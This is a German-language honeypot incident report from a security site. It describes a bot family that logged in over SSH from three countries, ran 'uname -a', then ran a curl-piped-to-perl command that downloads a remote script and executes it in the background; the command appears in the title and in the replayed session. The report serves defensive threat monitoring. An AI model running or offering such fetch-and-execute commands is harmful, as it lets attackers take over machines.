ALLSmartSecurity
Angriffsfall

Aufklaerung nach Login: 3 Sitzungen von 3 IPs, „curl -sS --max-time 1 http://[IP]/zed “

29.09.2026 · Aufklaerung nach Login · 3 Anfragen · Dauer keine Angabe · Philippinen

Überblick

Klassifizierung
Aufklaerung nach Login
Angriffsmuster
shell_session, Recon
Herkunft
Philippinen · Philippine Long Distance Telephone Co.

3 verschiedene Sitzungen (3 Durchlaeufe) von 3 IPs, Laender: PH (1), AU (1), US (1). Dienst: ssh/22. Immer dieselbe Kommandofolge, daher ein Bot bzw. eine Bot-Familie.

Erkannte Signaturen

Der Angriff, nachgespielt

echter Mitschnitt unserer Fake-Shell; die Antworten sind erfunden, ausgefuehrt wurde nie etwas
root@srv01: ~

root@srv01:~$ uname -a 2>/dev/null
Linux proxy 5.10.0-23-amd64 #1 SMP Debian 5.10.179-2 (2023-07-05) x86_64 GNU/Linux
root@srv01:~$ curl -sS --max-time 1 http://[IP]/zed 2>/dev/null | perl &
[1] 1234

Ablauf

(2 von 3, Wiederholungen zusammengefasst)
ZeitMethodePfad / PayloadMuster
+0 sCMDuname -a 2>/dev/null
+0 sCMDcurl -sS --max-time 1 http://[IP]/zed 2>/dev/null | perl &